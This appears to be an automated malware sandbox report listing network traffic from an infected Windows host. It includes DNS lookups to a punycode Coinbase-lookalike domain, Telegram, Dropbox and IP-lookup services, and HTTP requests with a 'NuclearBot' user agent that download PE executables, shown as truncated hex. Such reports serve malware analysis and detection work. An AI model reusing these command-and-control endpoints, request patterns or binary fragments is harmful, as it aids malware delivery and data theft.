Jul 6, 2024 13:29:23.978282928 CEST	49959	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.978282928 CEST	49959	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.983146906 CEST	80	49959	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.983269930 CEST	49959	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.988120079 CEST	80	49959	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:24.158431053 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:24.252631903 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:24.300925016 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:24.305551052 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:24.310898066 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:24.311136007 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:24.316010952 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:24.789191008 CEST	80	49959	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:24.789890051 CEST	80	49959	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:24.789940119 CEST	49959	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:26.152858019 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:26.231744051 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:26.285439014 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:26.346379995 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:33.608812094 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:33.613766909 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:33.613827944 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:33.618573904 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:33.939729929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:34.049515963 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:34.066585064 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:34.073740005 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:34.081746101 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:34.081801891 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:34.089721918 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:35.930610895 CEST	49959	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:36.455840111 CEST	49952	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:36.456095934 CEST	49960	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:36.460846901 CEST	6660	49952	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:36.460995913 CEST	6660	49960	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:36.461055994 CEST	49960	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:36.461344004 CEST	49960	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:36.466437101 CEST	6660	49960	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:38.210424900 CEST	6660	49960	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:38.210481882 CEST	49960	6660	192.168.2.4	94.232.249.204

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2024 13:26:57.142324924 CEST	63396	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:26:57.163058996 CEST	53	63396	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:07.634896040 CEST	50162	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:07.649292946 CEST	53	50162	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:12.551848888 CEST	50917	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:12.578268051 CEST	53	50917	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:14.821017981 CEST	57957	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:14.846481085 CEST	53	57957	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:16.281514883 CEST	64114	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:16.315220118 CEST	53	64114	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:19.320470095 CEST	50766	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:19.329668045 CEST	53	50766	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:21.281280994 CEST	60637	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:21.281765938 CEST	62906	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:21.288794994 CEST	53	60637	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:21.289696932 CEST	53	62906	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:22.028736115 CEST	62443	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:22.036364079 CEST	53	62443	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:22.073061943 CEST	49594	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:23.106578112 CEST	49594	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:27:23.166594028 CEST	53	49594	1.1.1.1	192.168.2.4
Jul 6, 2024 13:27:23.167161942 CEST	53	49594	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:09.291553020 CEST	62172	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:09.298573017 CEST	53	62172	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:09.878897905 CEST	62553	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:09.885947943 CEST	53	62553	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:27.644623995 CEST	56783	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:27.652460098 CEST	53	56783	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:37.298329115 CEST	53750	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:37.309245110 CEST	53	53750	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:37.738723993 CEST	55710	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:37.808413029 CEST	53	55710	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:38.554106951 CEST	58599	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:38.564553976 CEST	53	58599	1.1.1.1	192.168.2.4
Jul 6, 2024 13:28:44.915515900 CEST	61942	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:28:44.922348976 CEST	53	61942	1.1.1.1	192.168.2.4
Jul 6, 2024 13:29:02.610955000 CEST	59239	53	192.168.2.4	1.1.1.1
Jul 6, 2024 13:29:02.617752075 CEST	53	59239	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 6, 2024 13:26:57.142324924 CEST	192.168.2.4	1.1.1.1	0xed	Standard query (0)	auth.xn--conbase-sfb.xyz	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:07.634896040 CEST	192.168.2.4	1.1.1.1	0xe9cb	Standard query (0)	auth.xn--conbase-sfb.xyz	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:12.551848888 CEST	192.168.2.4	1.1.1.1	0x74dc	Standard query (0)	auth.xn--conbase-sfb.xyz	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:14.821017981 CEST	192.168.2.4	1.1.1.1	0xcfb0	Standard query (0)	www.igenius.org	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:16.281514883 CEST	192.168.2.4	1.1.1.1	0xa908	Standard query (0)	hrdc.pk	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:19.320470095 CEST	192.168.2.4	1.1.1.1	0x8c85	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:21.281280994 CEST	192.168.2.4	1.1.1.1	0xf17	Standard query (0)	dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:21.281765938 CEST	192.168.2.4	1.1.1.1	0xa9ab	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:22.028736115 CEST	192.168.2.4	1.1.1.1	0x13eb	Standard query (0)	ipbase.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:22.073061943 CEST	192.168.2.4	1.1.1.1	0x3ca6	Standard query (0)	www.westnilebirdingandsafari.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:23.106578112 CEST	192.168.2.4	1.1.1.1	0x3ca6	Standard query (0)	www.westnilebirdingandsafari.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:09.291553020 CEST	192.168.2.4	1.1.1.1	0xc2b7	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:09.878897905 CEST	192.168.2.4	1.1.1.1	0x8cf6	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:27.644623995 CEST	192.168.2.4	1.1.1.1	0x8f03	Standard query (0)	dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:37.298329115 CEST	192.168.2.4	1.1.1.1	0xc72	Standard query (0)	205.12.2.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 6, 2024 13:28:37.738723993 CEST	192.168.2.4	1.1.1.1	0xda02	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:38.554106951 CEST	192.168.2.4	1.1.1.1	0xfa91	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:44.915515900 CEST	192.168.2.4	1.1.1.1	0x6b4c	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:29:02.610955000 CEST	192.168.2.4	1.1.1.1	0x48fe	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 6, 2024 13:26:57.163058996 CEST	1.1.1.1	192.168.2.4	0xed	No error (0)	auth.xn--conbase-sfb.xyz		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:26:57.163058996 CEST	1.1.1.1	192.168.2.4	0xed	No error (0)	auth.xn--conbase-sfb.xyz		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:07.649292946 CEST	1.1.1.1	192.168.2.4	0xe9cb	No error (0)	auth.xn--conbase-sfb.xyz		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:07.649292946 CEST	1.1.1.1	192.168.2.4	0xe9cb	No error (0)	auth.xn--conbase-sfb.xyz		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:12.578268051 CEST	1.1.1.1	192.168.2.4	0x74dc	No error (0)	auth.xn--conbase-sfb.xyz		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:12.578268051 CEST	1.1.1.1	192.168.2.4	0x74dc	No error (0)	auth.xn--conbase-sfb.xyz		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:14.846481085 CEST	1.1.1.1	192.168.2.4	0xcfb0	No error (0)	www.igenius.org	igenius.org		CNAME (Canonical name)	IN (0x0001)	false
Jul 6, 2024 13:27:14.846481085 CEST	1.1.1.1	192.168.2.4	0xcfb0	No error (0)	igenius.org		192.3.140.185	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:16.315220118 CEST	1.1.1.1	192.168.2.4	0xa908	No error (0)	hrdc.pk		64.31.40.18	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:19.329668045 CEST	1.1.1.1	192.168.2.4	0x8c85	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:21.288794994 CEST	1.1.1.1	192.168.2.4	0xf17	No error (0)	dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 6, 2024 13:27:21.288794994 CEST	1.1.1.1	192.168.2.4	0xf17	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.66.15	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:21.289696932 CEST	1.1.1.1	192.168.2.4	0xa9ab	No error (0)	freegeoip.app		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:21.289696932 CEST	1.1.1.1	192.168.2.4	0xa9ab	No error (0)	freegeoip.app		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:22.036364079 CEST	1.1.1.1	192.168.2.4	0x13eb	No error (0)	ipbase.com		172.67.209.71	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:22.036364079 CEST	1.1.1.1	192.168.2.4	0x13eb	No error (0)	ipbase.com		104.21.85.189	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:23.166594028 CEST	1.1.1.1	192.168.2.4	0x3ca6	No error (0)	www.westnilebirdingandsafari.com		75.119.203.100	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:27:23.167161942 CEST	1.1.1.1	192.168.2.4	0x3ca6	No error (0)	www.westnilebirdingandsafari.com		75.119.203.100	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:09.298573017 CEST	1.1.1.1	192.168.2.4	0xc2b7	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:09.298573017 CEST	1.1.1.1	192.168.2.4	0xc2b7	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:09.298573017 CEST	1.1.1.1	192.168.2.4	0xc2b7	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:09.885947943 CEST	1.1.1.1	192.168.2.4	0x8cf6	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:27.652460098 CEST	1.1.1.1	192.168.2.4	0x8f03	No error (0)	dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 6, 2024 13:28:27.652460098 CEST	1.1.1.1	192.168.2.4	0x8f03	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.66.15	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:37.309245110 CEST	1.1.1.1	192.168.2.4	0xc72	Name error (3)	205.12.2.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 6, 2024 13:28:37.808413029 CEST	1.1.1.1	192.168.2.4	0xda02	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:37.808413029 CEST	1.1.1.1	192.168.2.4	0xda02	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:38.564553976 CEST	1.1.1.1	192.168.2.4	0xfa91	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:38.564553976 CEST	1.1.1.1	192.168.2.4	0xfa91	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:44.922348976 CEST	1.1.1.1	192.168.2.4	0x6b4c	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:44.922348976 CEST	1.1.1.1	192.168.2.4	0x6b4c	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:28:44.922348976 CEST	1.1.1.1	192.168.2.4	0x6b4c	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Jul 6, 2024 13:29:02.617752075 CEST	1.1.1.1	192.168.2.4	0x48fe	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

auth.xn--conbase-sfb.xyz

api.telegram.org

freegeoip.app

dl.dropboxusercontent.com

ipbase.com

api.ipify.org

api.mylnikov.org

pastebin.com

www.igenius.org

hrdc.pk

www.westnilebirdingandsafari.com

ip-api.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.97.3	80	7152	C:\Windows\System32\relog.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:07.661295891 CEST	114	OUT	GET /api/update.pack HTTP/1.1 User-Agent: NuclearBot Host: auth.xn--conbase-sfb.xyz Cache-Control: no-cache
Jul 6, 2024 13:27:08.304615974 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:08 GMT Content-Length: 270848 Connection: keep-alive Last-Modified: Mon, 01 Jul 2024 05:33:50 GMT ETag: "42200-61c28f1291b41" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dio18RgX4e%2BgBH3CnXvOdCtF%2FCUvrDnB8exXY23l2626dehfOl0jLUqs7ufIWfVbjs%2FeBCGOzlCs7KznmYyLADhEnae1k74oZpeph5LVKczU6Xj9SInbwG0o%2BoJGYqvu9Cql3jWhikhSvRs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3e6b8c4b8c1d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd cb 1a 09 b9 aa 74 5a b9 aa 74 5a b9 aa 74 5a b9 aa 75 5a c1 aa 74 5a 45 dd cd 5a be aa 74 5a 7d 6f b9 5a b0 aa 74 5a 7d 6f bb 5a 84 aa 74 5a 7d 6f ba 5a 14 aa 74 5a 9e 6c ba 5a bc aa 74 5a 9e 6c bb 5a ad aa 74 5a 9e 6c be 5a b8 aa 74 5a 9e 6c bd 5a b8 aa 74 5a 9e 6c b8 5a b8 aa 74 5a 52 69 63 68 b9 aa 74 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 be 3f 82 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 d6 02 00 00 ec 01 00 00 00 00 00 70 d5 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tZtZtZuZtZEZtZ}oZtZ}oZtZ}oZtZlZtZlZtZlZtZlZtZlZtZRichtZPEd?f" p`S$(0mp@.text< `.rdataC@
Jul 6, 2024 13:27:08.304836035 CEST	1236	IN	Data Raw: 00 40 2e 64 61 74 61 00 00 00 c8 cb 00 00 00 c0 03 00 00 28 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 30 00 00 00 90 04 00 00 32 00 00 00 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 Data Ascii: @.data(@.pdata02@@.rsrc@@.relocd "@B
Jul 6, 2024 13:27:08.304869890 CEST	1236	IN	Data Raw: 8b 18 eb 0d 48 8b 4b 10 e8 1d 14 00 00 48 8b 5b 08 48 85 db 75 ee 48 8b 4f 38 e8 0b 14 00 00 48 8b 4f 30 e8 02 14 00 00 48 8b cf 48 8b 5c 24 30 48 83 c4 20 5f 48 ff 25 92 d3 03 00 cc cc 45 33 c0 e9 8c 0b 00 00 48 89 5c 24 18 48 89 4c 24 08 55 48 Data Ascii: HKH[HuHO8HO0HH\$0H _H%E3H\$HL$UHH EHu3HHtHMHUAuHEHUHHEuLCHUH?uLCHUHC{uHUH
Jul 6, 2024 13:27:08.304887056 CEST	1236	IN	Data Raw: 3b 5c 24 68 75 23 ff 15 6e d0 03 00 48 8d 54 24 68 44 8b c6 44 89 30 48 8b cb c7 07 02 00 00 00 ff 15 6c d0 03 00 89 47 08 ff 15 4b d0 03 00 44 39 30 75 07 48 3b 5c 24 68 75 07 44 89 37 48 89 5f 08 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 8b 74 24 Data Ascii: ;\$hu#nHT$hDD0HlGKD90uH;\$huD7H_3H\$`Hl$pHt$xH0A_A^A]A\_H\$Hl$Ht$WH AA@uu-u:3@.ut#@euuCGtu@0uu.u0@t"
Jul 6, 2024 13:27:08.304903984 CEST	1236	IN	Data Raw: 00 00 eb 1e b8 05 00 00 00 eb 17 49 8b 06 c6 04 06 00 45 8b c5 49 8b d7 48 8b cd e8 62 f7 ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 30 41 5f 41 5e 41 5d 5f 5e c3 cc 48 89 5c 24 08 48 89 74 24 18 57 48 83 ec 20 48 8b 02 49 8b d8 48 8b fa Data Ascii: IEIHb3H\$`Hl$pH0A_A^A]_^H\$Ht$WH HIH8"H8[8fty8ntK8tto8{tv-AHCHuLHHAHHYAu`AKAHH
Jul 6, 2024 13:27:08.304919958 CEST	1236	IN	Data Raw: 00 48 03 47 10 48 3b c3 76 04 b0 01 eb 02 32 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 83 ec 28 48 83 79 18 10 72 0b 48 8b 09 e8 39 8a 00 00 48 8b c8 48 8b c1 48 83 c4 28 c3 cc cc 48 89 5c 24 08 48 89 6c 24 18 48 89 74 24 20 57 48 83 ec 20 Data Ascii: HGH;v2H\$0H _H(HyrH9HHH(H\$Hl$Ht$ WH IHtEHyr>H)MtHLHHH_HT$8HLCHHHHHGH\$0Hl$@Ht$HH _RH(HH(Hq$
Jul 6, 2024 13:27:08.304936886 CEST	776	IN	Data Raw: ff 48 8b c3 48 83 c4 20 5b c3 40 53 48 83 ec 20 48 8b da 41 83 f8 01 75 11 48 8d 15 06 cf 02 00 48 8b cb e8 4e ea ff ff eb 05 e8 ab ff ff ff 48 8b c3 48 83 c4 20 5b c3 cc cc 40 53 48 83 ec 20 41 8b c8 48 8b da e8 97 8c 01 00 48 8d 15 7c ce 02 00 Data Ascii: HH [@SH HAuHHNHH [@SH AHH\|HHHEHH [H(MtHHH(H9HHHa@SH <HHt3HDBHH [H\$WH HHHH[
Jul 6, 2024 13:27:08.304954052 CEST	1236	IN	Data Raw: c6 03 00 48 8d 05 ec cd 02 00 48 89 05 c5 c6 03 00 48 8d 05 f6 cd 02 00 48 89 05 a7 c6 03 00 48 8d 05 00 ce 02 00 48 89 05 b1 c6 03 00 48 8d 05 02 ce 02 00 48 89 05 ab c6 03 00 48 8d 05 04 ce 02 00 48 89 05 a5 c6 03 00 48 8d 05 12 ce 02 00 48 89 Data Ascii: HHHHHHHHHHHHHHHHHHH6HH8HHBHHLHHVHHPHyHRHsHTHmH
Jul 6, 2024 13:27:08.304970026 CEST	1236	IN	Data Raw: 8d 05 34 cf 02 00 48 89 05 5d c4 03 00 48 8d 05 36 cf 02 00 48 89 05 57 c4 03 00 48 8d 05 38 cf 02 00 48 89 05 51 c4 03 00 48 8d 05 3a cf 02 00 48 89 05 4b c4 03 00 48 8d 05 3c cf 02 00 48 89 05 45 c4 03 00 48 8d 05 3e cf 02 00 48 89 05 3f c4 03 Data Ascii: 4H]H6HWH8HQH:HKH<HEH>H?HHH9HJH3HLH-HNH'HXH!HZHHdHHnHHxHHHHHH
Jul 6, 2024 13:27:08.304987907 CEST	1236	IN	Data Raw: 02 00 48 89 05 2d c3 03 00 48 8d 05 76 d0 02 00 48 89 05 2f c3 03 00 48 8d 05 70 d0 02 00 48 89 05 29 c3 03 00 48 8d 05 8a d0 02 00 48 89 05 33 c3 03 00 48 8d 05 8c d0 02 00 48 89 05 2d c3 03 00 48 8d 05 8e d0 02 00 48 89 05 37 c3 03 00 48 8d 05 Data Ascii: H-HvH/HpH)HH3HH-HH7HH1HHCH$HIHHL=HHLHHzHH\|HH~HHHHH
Jul 6, 2024 13:27:08.309663057 CEST	1236	IN	Data Raw: 00 00 48 89 05 69 af 03 00 ff 15 13 af 03 00 48 8b 15 f4 b8 03 00 48 8b 8c 24 80 00 00 00 48 89 05 55 af 03 00 ff 15 f7 ae 03 00 48 8b 15 e0 b8 03 00 48 8b cb 48 89 05 46 af 03 00 ff 15 e0 ae 03 00 48 8b 15 d1 b8 03 00 49 8b cd 48 89 05 37 af 03 Data Ascii: HiHH$HUHHHFHIH7HIH(H$HHHHHH\|HHHeHvHHNHoIH7H`I
Jul 6, 2024 13:27:09.169167995 CEST	115	OUT	GET /api/update2.pack HTTP/1.1 User-Agent: NuclearBot Host: auth.xn--conbase-sfb.xyz Cache-Control: no-cache
Jul 6, 2024 13:27:09.361864090 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:09 GMT Content-Length: 88576 Connection: keep-alive Last-Modified: Thu, 06 Jun 2024 17:04:07 GMT ETag: "15a00-61a3babc14dc4" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eqzmg44SpIW4n2Y4rdSXtOtIu7qV30K6WeUhteYKbZdvBLqQaBgpylrUWF24tIb%2BiSpcgqa54ZM82p29ABOe63BOsAntSee5ifySzbUpP0GPHwjLKVRWWndqqsH7q87Pm2EiGJiL3Wj6q%2BI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3e72a9148c1d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 0f 2c 83 02 6e 42 d0 02 6e 42 d0 02 6e 42 d0 02 6e 43 d0 96 6e 42 d0 fe 19 fb d0 11 6e 42 d0 fe 19 fe d0 03 6e 42 d0 c6 ab 8d d0 26 6e 42 d0 c6 ab 8c d0 54 6e 42 d0 c6 ab 8f d0 0b 6e 42 d0 25 a8 91 d0 05 6e 42 d0 25 a8 88 d0 03 6e 42 d0 25 a8 8e d0 03 6e 42 d0 52 69 63 68 02 6e 42 d0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 07 ec 61 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 be 00 00 00 bc 00 00 00 00 00 00 b0 34 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$F,nBnBnBnCnBnBnB&nBTnBnB%nB%nB%nBRichnBPEdaf" 4` 2W&xL`pH.texto `.rdatawbd@@.datap<@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:12.583743095 CEST	173	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
